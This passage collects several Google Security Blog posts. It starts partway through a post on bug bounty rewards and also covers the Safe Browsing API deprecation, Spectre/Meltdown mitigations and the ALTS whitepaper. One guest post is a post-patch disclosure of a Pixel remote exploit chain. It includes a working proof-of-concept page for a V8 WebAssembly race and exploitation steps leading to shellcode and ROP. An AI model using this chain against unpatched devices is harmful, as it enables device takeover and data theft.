years, so we announced that the greatest reward for a remote exploit chain--or exploit leading to TrustZone or Verified Boot compromise--would increase from $50,000 to $200,000. We also increased the top-end reward for a remote kernel exploit from $30,000 to $150,000.In October, we introduced the by-invitation-only Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play.Today, we’re expanding the range of rewards for remote code executions from $1,000 to $5,000. We’re also introducing a new category that includes vulnerabilities that could result in the theft of users’ private data, information being transferred unencrypted, or bugs that result in access to protected app components. We’ll award $1,000 for these bugs. For more information visit the Google Play Security Reward Program site.And finally, we want to give a shout out to the researchers who’ve submitted fuzzers to the Chrome Fuzzer Program: they get rewards for every eligible bug their fuzzers find without having to do any more work, or even filing a bug.Given how well things have been going these past years, we look forward to our Vulnerability Rewards Programs resulting in even more user protection in 2018 thanks to the hard work of the security research community.* Andrew Whalley (Chrome VRP), Mayank Jain (Android Security Rewards), and Renu Chaudhary (Google Play VRP) contributed mightily to help lead these Google-wide efforts.

Posted by Alex Wozniak, Software Engineer, Safe Browsing TeamIn May 2016, we introduced the latest version of the Google Safe Browsing API (v4). Since this launch, thousands of developers around the world have adopted the API to protect over 3 billion devices from unsafe web resources.Coupled with that announcement was the deprecation of legacy Safe Browsing APIs, v2 and v3. Today we are announcing an official turn-down date of October 1st, 2018, for these APIs. All v2 and v3 clients must transition to the v4 API prior to this date.To make the switch easier, an open source implementation of the Update API (v4) is available on GitHub. Android developers always get the latest version of Safe Browsing’s data and protocols via the SafetyNet Safe Browsing API. Getting started is simple; all you need is a Google Account, Google Developer Console project, and an API key.For questions or feedback, join the discussion with other developers on the Safe Browsing Google Group. Visit our website for the latest information on Safe Browsing.

Posted by Mayank Jain and Scott Roberts, Android security team[Cross-posted from the Android Developers Blog]In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues. All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation. The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University. The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.Technical details of a Pixel remote exploit chainThe Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process. This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys). The RCE bug (CVE-2017-5116)New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access. The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time. i::wasm::ModuleWireBytes GetFirstArgumentAsBytes( const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) { ...... } else if (source->IsTypedArray()) { //--->source should be checked if it's backed by a SharedArrayBuffer // A TypedArray was passed. Local<TypedArray> array = Local<TypedArray>::Cast(source); Local<ArrayBuffer> buffer = array->Buffer(); ArrayBuffer::Contents contents = buffer->GetContents(); start = reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset(); length = array->ByteLength(); } ...... return i::wasm::ModuleWireBytes(start, start + length);}A simple PoC is as follows: <html><h1>poc</h1><script id="worker1">worker:{ self.onmessage = function(arg) { console.log("worker started"); var ta = new Uint8Array(arg.data); var i =0; while(1){ if(i==0){ i=1; ta[51]=0; //--->4)modify the webassembly code at the same time }else{ i=0; ta[51]=128; } } }}</script><script>function getSharedTypedArray(){ var wasmarr = [ 0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e, 0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65, 0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01, 0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b, 0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b]; var sb = new SharedArrayBuffer(wasmarr.length); //---> 1)put WebAssembly code in a SharedArrayBuffer var sta = new Uint8Array(sb); for(var i=0;i<sta.length;i++) sta[i]=wasmarr[i]; return sta; }var blob = new Blob([ document.querySelector('#worker1').textContent ], { type: "text/javascript" })var worker = new Worker(window.URL.createObjectURL(blob)); //---> 2)create a web workervar sta = getSharedTypedArray();worker.postMessage(sta.buffer); //--->3)pass the WebAssembly code to the web workersetTimeout(function(){ while(1){ try{ sta[51]=0; var myModule = new WebAssembly.Module(sta); //--->4)parse the WebAssembly code var myInstance = new WebAssembly.Instance(myModule); //myInstance.exports.getAnswerPlus1(); }catch(e){ } } },1000);//worker.terminate(); </script></html>The text format of the WebAssembly code is as follows: 00002b func[0]:00002d: 41 2a | i32.const 4200002f: 0b | end000030 func[1]:000032: 10 00 | call 0000034: 41 01 | i32.const 1000036: 6a | i32.add000037: 0b | endFirst, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread's bound check, the instruction " call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs. Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked. (func $leak(param i32 i32 i32 i32 i32 i32)(result i32) i32.const 0 get_local 0 i32.store i32.const 4 get_local 1 i32.store i32.const 8 get_local 2 i32.store i32.const 12 get_local 3 i32.store i32.const 16 get_local 4 i32.store i32.const 20 get_local 5 i32.store i32.const 0 ))Not only the instruction "call 0" can be modified, any "call funcx" instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript: /*Text format of funcx*/ (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32) get_local 5 get_local 4 i32.add)/*Disassembly code of funcx*/--- Code ---kind = WASM_FUNCTIONname = wasm#1compiler = turbofanInstructions (size = 20)0x58f87600 0 8b442404 mov eax,[esp+0x4]0x58f87604 4 03c6 add eax,esi0x58f87606 6 c20400 ret 0x40x58f87609 9 0f1f00 nopSafepoints (size = 8)RelocInfo (size = 0)--- End code ---When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If "call funcx" is modified to call the following JS_TO_WASM function. /*Disassembly code of JS_TO_WASM function */--- Code ---kind = JS_TO_WASM_FUNCTIONname = js-to-wasm#0compiler = turbofanInstructions (size = 170)0x4be08f20 0 55 push ebp0x4be08f21 1 89e5 mov ebp,esp0x4be08f23 3 56 push esi0x4be08f24 4 57 push edi0x4be08f25 5 83ec08 sub esp,0x80x4be08f28 8 8b4508 mov eax,[ebp+0x8]0x4be08f2b b e8702e2bde call 0x2a0bbda0 (ToNumber) ;; code: BUILTIN0x4be08f30 10 a801 test al,0x10x4be08f32 12 0f852a000000 jnz 0x4be08f62 <+0x42>The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows: /* ArrayBuffer layouts 40 Bytes*/ Map Properties Elements ByteLength BackingStore AllocationBase AllocationLength Fields internal internal /* Map layouts 44 Bytes*/ static kMapOffset = 0, static kInstanceSizesOffset = 4, static kInstanceAttributesOffset = 8, static kBitField3Offset = 12, static kPrototypeOffset = 16, static kConstructorOrBackPointerOffset = 20, static kTransitionsOrPrototypeInfoOffset = 24, static kDescriptorsOffset = 28, static kLayoutDescriptorOffset = 1, static kCodeCacheOffset = 32, static kDependentCodeOffset = 36, static kWeakCellCacheOffset = 40, static kPointerFieldsBeginOffset = 16, static kPointerFieldsEndOffset = 44, static kInstanceSizeOffset = 4, static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5, static kUnusedOffset = 6, static kVisitorIdOffset = 7, static kInstanceTypeOffset = 8, //one byte static kBitFieldOffset = 9, static kInstanceTypeAndBitFieldOffset = 8, static kBitField2Offset = 10, static kUnusedPropertyFieldsOffset = 11Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode. Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit. The EoP Bug (CVE-2017-14904)The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap: static int gralloc_map(gralloc_module_t const* module, buffer_handle_t handle){ …… private_handle_t* hnd = (private_handle_t*)handle; …… if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) && !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) { size = hnd->size; err = memalloc->map_buffer(&mappedAddress, size, hnd->offset, hnd->fd); //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process. if(err || mappedAddress == MAP_FAILED) { ALOGE("Could not mmap handle %p, fd=%d (%s)", handle, hnd->fd, strerror(errno)); return -errno; } hnd->base = uint64_t(mappedAddress) + hnd->offset; //---> save mappedAddress+offset to hnd->base } else { err = -EACCES;}…… return err;}gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. hnd->offset can be manipulated from a Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process. static int gralloc_unmap(gralloc_module_t const* module, buffer_handle_t handle){ …… if(hnd->base) { err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset); //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched. if (err) { ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base, strerror(errno)); return -errno; } hnd->base = 0;}…… return 0;}int IonAlloc::unmap_buffer(void *base, unsigned int size, unsigned int /*offset*/) //---> look, offset is not used by unmap_buffer{ int err = 0; if(munmap(base, size)) { err = -errno; ALOGE("ion: Failed to unmap memory at %p : %s", base, strerror(errno)); } return err;}Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services. 52neverallow isolated_app {53 service_manager_type54 -activity_service55 -display_service56 -webviewupdate_service57}:service_manager find;To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered. This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app. To exploit this EoP bug: 1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping: 7f54600000-7f54800000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f58000000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)......2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]//--->There is a 2MB memory gap7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)3. Fill the unmapped space with an ashmem memory: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f547ff000-7f549ff000 rw-s 00000000 00:04 31605 /dev/ashmem/360alpha1001 (deleted) //--->The gap is filled with the ashmem memory 360alpha10017f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)4. Spray the heap and the heap data will be written to the ashmem memory: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f547ff000-7f549ff000 rw-s 00000000 00:04 31605 /dev/ashmem/360alpha1001 (deleted)//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still mongered by it and will allocate memory from this range, result in heap data is written to ashmem memory7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)5. Because the filled ashmem in step 3 is mapped both by system_server and render process, part of the heap of system_server can be read and written by render process and we can trigger system_server to allocate some GraphicBuffer object in ashmem. As GraphicBuffer is inherited from ANativeWindowBuffer, which has a member named common whose type is android_native_base_t, we can read two function points (incRef and decRef) from ashmem memory and then can calculate the base address of the module libui. In the latest Pixel device, Chrome's render process is still 32-bit process but system_server is 64-bit process. So we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger ROP. Unluckily, it seems that the points incRef and decRef haven't been used. It's impossible to modify it to jump to ROP, but we can modify the virtual table of GraphicBuffer to trigger ROP. typedef struct android_native_base_t{ /* a magic value defined by the actual EGL native type */ int magic; /* the sizeof() of the actual EGL native type */ int version; void* reserved[4]; /* reference-counting interface */ void (*incRef)(struct android_native_base_t* base); void (*decRef)(struct android_native_base_t* base);} android_native_base_t;6.Trigger a GC to execute ROP When a GraphicBuffer object is deconstructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to ROP. When GC happens, the control flow goes to ROP. Finding an ROP chain in limited module(libui) is challenging, but after hard work, we successfully found one and dumped the contents of the file into /data/misc/wifi/wpa_supplicant.conf . SummaryThe Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate against similar vulnerabilities. The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Thanks very much for their effort. .com { color: #32CD32; font-weight: bold; }

Posted by Matt Linton, Senior Security Engineer and Pat Parseghian, Technical Program ManagerYesterday, Google’s Project Zero team posted detailed technical information on three variants of a new security issue involving speculative execution on many modern CPUs. Today, we’d like to share some more information about our mitigations and performance.In response to the vulnerabilities that were discovered we developed a novel mitigation called “Retpoline” -- a binary modification technique that protects against “branch target injection” attacks. We shared Retpoline with our industry partners and have deployed it on Google’s systems, where we have observed negligible impact on performance.In addition, we have deployed Kernel Page Table Isolation (KPTI) -- a general purpose technique for better protecting sensitive information in memory from other software running on a machine -- to the entire fleet of Google Linux production servers that support all of our products, including Search, Gmail, YouTube, and Google Cloud Platform.There has been speculation that the deployment of KPTI causes significant performance slowdowns. Performance can vary, as the impact of the KPTI mitigations depends on the rate of system calls made by an application. On most of our workloads, including our cloud infrastructure, we see negligible impact on performance.In our own testing, we have found that microbenchmarks can show an exaggerated impact. Of course, Google recommends thorough testing in your environment before deployment; we cannot guarantee any particular performance or operational impact.Speculative Execution and the Three Methods of AttackIn addition, to follow up on yesterday’s post, today we’re providing a summary of speculative execution and how each of the three variants work.In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.Project Zero discussed three variants of speculative execution attack. There is no single fix for all three attack variants; each requires protection independently.Variant 1 (CVE-2017-5753), “bounds check bypass.” This vulnerability affects specific sequences within compiled applications, which must be addressed on a per-binary basis.Variant 2 (CVE-2017-5715), “branch target injection”. This variant may either be fixed by a CPU microcode update from the CPU vendor, or by applying a software mitigation technique called “Retpoline” to binaries where concern about information leakage is present. This mitigation may be applied to the operating system kernel, system programs and libraries, and individual software programs, as needed.Variant 3 (CVE-2017-5754), “rogue data cache load.” This may require patching the system’s operating system. For Linux there is a patchset called KPTI (Kernel Page Table Isolation) that helps mitigate Variant 3. Other operating systems may implement similar protections - check with your vendor for specifics.SummaryMitigationVariant 1: bounds check bypass (CVE-2017-5753)This attack variant allows malicious code to circumvent bounds checking features built into most binaries. Even though the bounds checks will still fail, the CPU will speculatively execute instructions after the bounds checks, which can access memory that the code could not normally access. When the CPU determines the bounds check has failed, it discards any work that was done speculatively; however, some changes to the system can be still observed (in particular, changes to the state of the CPU caches). The malicious code can detect these changes and read the data that was speculatively accessed.The primary ramification of Variant 1 is that it is difficult for a system to run untrusted code within a process and restrict what memory within the process the untrusted code can access.In the kernel, this has implications for systems such as the extended Berkeley Packet Filter (eBPF) that takes packet filterers from user space code, just-in-time (JIT) compiles the packet filter code, and runs the packet filter within the context of kernel. The JIT compiler uses bounds checking to limit the memory the packet filter can access, however, Variant 1 allows an attacker to use speculation to circumvent these limitations.Mitigation requires analysis and recompilation so that vulnerable binary code is not emitted. Examples of targets which may require patching include the operating system and applications which execute untrusted code.Variant 2: branch target injection (CVE-2017-5715)This attack variant uses the ability of one process to influence the speculative execution behavior of code in another security context (i.e., guest/host mode, CPU ring, or process) running on the same physical CPU core.Modern processors predict the destination for indirect jumps and calls that a program may take and start speculatively executing code at the predicted location. The tables used to drive prediction are shared between processes running on a physical CPU core, and it is possible for one process to pollute the branch prediction tables to influence the branch prediction of another process or kernel code.In this way, an attacker can cause speculative execution of any mapped code in another process, in the hypervisor, or in the kernel, and potentially read data from the other protection domain using techniques like Variant 1. This variant is difficult to use, but has great potential power as it crosses arbitrary protection domains.Mitigating this attack variant requires either installing and enabling a CPU microcode update from the CPU vendor (e.g., Intel's IBRS microcode), or applying a software mitigation (e.g., Google's Retpoline) to the hypervisor, operating system kernel, system programs and libraries, and user applications.Variant 3: rogue data cache load (CVE-2017-5754)This attack variant allows a user mode process to access virtual memory as if the process was in kernel mode. On some processors, the speculative execution of code can access memory that is not typically visible to the current execution mode of the processor; i.e., a user mode program may speculatively access memory as if it were running in kernel mode.Using the techniques of Variant 1, a process can observe the memory that was accessed speculatively. On most operating systems today, the page table that a process uses includes access to most physical memory on the system, however access to such memory is limited to when the process is running in kernel mode. Variant 3 enables access to such memory even in user mode, violating the protections of the hardware.Mitigating this attack variant requires patching the operating system. For Linux, the patchset that mitigates Variant 3 is called Kernel Page Table Isolation (KPTI). Other operating systems/providers should implement similar mitigations.Mitigations for Google productsYou can learn more about mitigations that have been applied to Google’s infrastructure, products, and services here.

Posted by Matt Linton, Senior Security Engineer and Pat Parseghian, Technical Program Manager[Google Cloud, G Suite, and Chrome customers can visit the Google Cloud blog for details about those products][For more technical details about this issue, please read Project Zero's blog post]Last year, Google’s Project Zero team discovered serious security flaws caused by “speculative execution,” a technique used by most modern processors (CPUs) to optimize performance.The Project Zero researcher, Jann Horn, demonstrated that malicious actors could take advantage of speculative execution to read system memory that should have been inaccessible. For example, an unauthorized party may read sensitive information in the system’s memory such as passwords, encryption keys, or sensitive information open in applications. Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host.These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running on them.As soon as we learned of this new class of attack, our security and product development teams mobilized to defend Google’s systems and our users’ data. We have updated our systems and affected products to protect against this new type of attack. We also collaborated with hardware and software manufacturers across the industry to help protect their users and the broader web. These efforts have included collaborative analysis and the development of novel mitigations.We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation. The full Project Zero report is forthcoming (update: this has been published; see above).Mitigation status for Google productsA list of affected Google products and their current status of mitigation against this attack appears here. As this is a new class of attack, our patch status refers to our mitigation for currently known vectors for exploiting the flaw. The issue has been mitigated in many products (or wasn’t a vulnerability in the first place). In some instances, users and customers may need to take additional steps to ensure they’re using a protected version of a product. This list and a product’s status may change as new developments warrant. In the case of new developments, we will post updates to this blog.All Google products not explicitly listed below require no user or customer action.AndroidDevices with the latest security update are protected. Furthermore, we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices.Supported Nexus and Pixel devices with the latest security update are protected.Further information is available here.Google Apps / G Suite (Gmail, Calendar, Drive, Sites, etc.):No additional user or customer action needed.Google ChromeSome user or customer action needed. More information here.Google Chrome OS (e.g., Chromebooks):Some additional user or customer action needed. More information here.Google Cloud PlatformGoogle App Engine: No additional customer action needed.Google Compute Engine: Some additional customer action needed. More information here.Google Kubernetes Engine: Some additional customer action needed. More information here.Google Cloud Dataflow: Some additional customer action needed. More information here.Google Cloud Dataproc: Some additional customer action needed. More information here. All other Google Cloud products and services: No additional action needed.Google Home / Chromecast:No additional user action needed.Google Wifi/OnHub:No additional user action needed.Multiple methods of attackTo take advantage of this vulnerability, an attacker first must be able to run malicious code on the targeted system.The Project Zero researchers discovered three methods (variants) of attack, which are effective under different conditions. All three attack variants can allow a process with normal user privileges to perform unauthorized reads of memory data, which may contain sensitive information such as passwords, cryptographic key material, etc.In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.There is no single fix for all three attack variants; each requires protection independently. Many vendors have patches available for one or more of these attacks.We will continue our work to mitigate these vulnerabilities and will update both our product support page and this blog post as we release further fixes. More broadly, we appreciate the support and involvement of all the partners and Google engineers who worked tirelessly over the last few months to make our users and customers safe.Blog post update logAdded link to Project Zero blogAdded link to Google Cloud blog

Posted by Cesar Ghali and Julien Boeuf, Engineers on the Security & Privacy TeamAt Google, protection of customer data is a top priority. One way we do this is by protecting data in transit by default. We protect data when it is sent to Google using secure communication protocols such as TLS (Transport Layer Security). Within our infrastructure, we protect service-to-service communications at the application layer using a system called Application Layer Transport Security (ALTS). ALTS authenticates the communication between Google services and helps protect data in transit. Today, we’re releasing a whitepaper, “Application Layer Transport Security,” that goes into detail about what ALTS is, how it protects data, and how it’s implemented at Google.ALTS is a highly reliable, trusted system that provides authentication and security for our internal Remote Procedure Call (RPC) communications. ALTS requires minimal involvement from the services themselves. When services communicate with each other at Google, such as the Gmail frontend communicating with a storage backend system, they do not need to explicitly configure anything to ensure data transmission is protected - it is protected by default. All RPCs issued or received by a production workload that stay within a physical boundary controlled by or on behalf of Google are protected with ALTS by default. This delivers numerous benefits while allowing the system work at scale:More precise security: Each workload has its own identity. This allows workloads running on the same machine to authenticate using their own identity as opposed to the machine’s identity.Improved scalability: ALTS accommodates Google’s massive scale by using an efficient resumption mechanism embedded in the ALTS handshake protocol, allowing services that were already communicating to easily resume communications. ALTS can also accommodate the authentication and encryption needs of a large number of RPCs; for example, services running on Google production systems collectively issue on the order of O(1010) RPCs per second.Reduced overhead: The overhead of potentially expensive cryptographic operations can be reduced by supporting long-lived RPC channels.Multiple features that ensure security and scalabilityInside physical boundaries controlled by or on behalf of Google, all scheduled production workloads are initialized with a certificate that asserts their identity. These credentials are securely delivered to the workloads. When a workload is involved in an ALTS handshake, it verifies the remote peer identity and certificate. To further increase security, all Google certificates have a relatively short lifespan.ALTS has a flexible trust model that works for different types of entities on the network. Entities can be physical machines, containerized workloads, and even human users to whom certificates can be provisioned.ALTS provides a handshake protocol, which is a Diffie-Hellman (DH) based authenticated key exchange protocol that Google developed and implemented. At the end of a handshake, ALTS provides applications with an authenticated remote peer identity, which can be used to enforce fine-grained authorization policies at the application layer.ALTS ensures the integrity of Google traffic is protected, and encrypted as needed.After a handshake is complete and the client and server negotiate the necessary shared secrets, ALTS secures RPC traffic by forcing integrity, and optional encryption, using the negotiated shared secrets. We support multiple protocols for integrity guarantees, e.g., AES-GMAC and AES-VMAC with 128-bit keys. Whenever traffic leaves a physical boundary controlled by or on behalf of Google, e.g., in transit over WAN between datacenters, all protocols are upgraded automatically to provide encryption as well as integrity guarantees. In this case, we use the AES-GCM and AES-VCM protocols with 128-bit keys.More details on how Google data encryption is performed are available in another whitepaper we are releasing today, “Encryption in Transit in Google Cloud.”In summary, ALTS is widely used in Google’s infrastructure to provide service-to-service authentication and integrity, with optional encryption for all Google RPC traffic. For more information about ALTS, please read our whitepaper, “Application Layer Transport Security.”

